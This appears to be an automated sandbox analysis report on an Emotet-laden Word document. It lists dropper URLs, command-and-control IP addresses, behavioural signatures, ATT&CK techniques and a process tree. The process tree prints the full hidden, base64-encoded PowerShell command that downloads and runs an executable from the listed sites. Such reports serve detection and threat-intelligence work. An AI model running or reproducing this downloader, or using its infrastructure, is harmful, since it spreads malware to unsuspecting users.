Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    14-01-2020 14:54

General

  • Target

    303c83d7c5144514e0e1ec75306981442078f9c634f3719612309701d4c29573

  • Sample

    200114-kqs99whdvs

  • SHA256

    303c83d7c5144514e0e1ec75306981442078f9c634f3719612309701d4c29573

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.tcjsl.com/wp-admin/o8FK323881/

exe.dropper

https://tecjofer.com/wp-includes/zA1kTqXJD/

exe.dropper

https://ribatturk.com/wp-includes/54M9uFGym/

exe.dropper

https://beluxuryre.com/sandbox/2G537/

exe.dropper

https://www.allowmefirstbuildcon.com/calendar/7x/

Extracted

Family

emotet

C2

70.184.69.146:80

186.177.165.196:443

139.47.135.215:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

177.34.142.163:80

200.123.183.137:443

2.47.112.72:80

190.17.44.48:80

187.54.225.76:80

190.219.149.236:80

190.100.153.162:443

58.171.38.26:80

91.205.215.57:7080

152.231.89.226:80

94.176.234.118:443

201.213.100.141:8080

203.25.159.3:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\303c83d7c5144514e0e1ec75306981442078f9c634f3719612309701d4c29573.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    PID:4868
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -en JABVAHAAdwBpAHoAdAB5AGIAPQAnAEUAawBjAGkAYgBuAG4AeAByACcAOwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgAgAD0AIAAnADUAMAA4ACcAOwAkAFcAZABsAHQAdwB3AGkAcwBmAG8APQAnAFQAaABkAGIAdQBsAGEAbQBoAGYAJwA7ACQAUQByAGsAbwB3AGEAawB0AGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgArACcALgBlAHgAZQAnADsAJABCAGYAawBxAGUAZgBqAGMAdwBsAHQAdAA9ACcAVwBjAHMAZgBhAHAAaABzAG8AJwA7ACQARgBxAGwAawByAHEAdAB4AGMAcwBpAD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAGMATABJAEUAbgBUADsAJABYAHcAZQBnAG4AagBvAHUAYgBuAHcAeABuAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB0AGMAagBzAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8AOABGAEsAMwAyADMAOAA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGUAYwBqAG8AZgBlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHoAQQAxAGsAVABxAFgASgBEAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBpAGIAYQB0AHQAdQByAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUANABNADkAdQBGAEcAeQBtAC8AKgBoAHQAdABwAHMAOgAvAC8AYgBlAGwAdQB4AHUAcgB5AHIAZQAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvADIARwA1ADMANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBsAGwAbwB3AG0AZQBmAGkAcgBzAHQAYgB1AGkAbABkAGMAbwBuAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwA3AHgALwAnAC4AIgBTAHAAYABsAEkAVAAiACgAJwAqACcAKQA7ACQATABkAGcAbQBzAGIAcQBrAHIAcwA9ACcAUwBvAGEAZQBhAG4AaQBvAGsAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBtAHIAbwBoAGEAbwB4AGwAaQBtACAAaQBuACAAJABYAHcAZQBnAG4AagBvAHUAYgBuAHcAeABuACkAewB0AHIAeQB7ACQARgBxAGwAawByAHEAdAB4AGMAcwBpAC4AIgBkAGAAbwBgAFcATgBsAE8AYABBAGQAZgBpAEwAZQAiACgAJABXAG0AcgBvAGgAYQBvAHgAbABpAG0ALAAgACQAUQByAGsAbwB3AGEAawB0AGUAKQA7ACQAWQB0AGIAZQBkAGwAagBxAHIAZwB0AD0AJwBRAGUAagBjAGkAZwBtAGYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAHIAawBvAHcAYQBrAHQAZQApAC4AIgBsAEUAbgBgAEcAYABUAGgAIgAgAC0AZwBlACAAMwAzADMAOQAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAcgBrAG8AdwBhAGsAdABlACkAOwAkAEEAawBoAGUAZwBmAHoAaABuAHIAbgB5AD0AJwBIAGYAagBhAHUAbAB1AHkAYgBrACcAOwBiAHIAZQBhAGsAOwAkAEwAYgB4AGMAagBnAHQAagBlAHMAZQBmAGsAPQAnAE0AbwBsAGMAZgBqAHEAYgBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFgAcAB4AGIAagB4AHUAaQB1AD0AJwBMAGkAaABmAHEAaABvAGIAZQBxACcA
    1⤵
    • Suspicious use of WriteProcessMemory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:1924
    • C:\Users\Admin\508.exe
      "C:\Users\Admin\508.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4528
      • C:\Users\Admin\508.exe
        --669ff01b
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4688

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\508.exe
  • C:\Users\Admin\508.exe
  • C:\Users\Admin\508.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/4528-7-0x0000000002280000-0x0000000002297000-memory.dmp
    Filesize

    92KB

  • memory/4688-10-0x0000000000520000-0x0000000000537000-memory.dmp
    Filesize

    92KB

  • memory/4688-11-0x0000000000400000-0x0000000000480000-memory.dmp
    Filesize

    512KB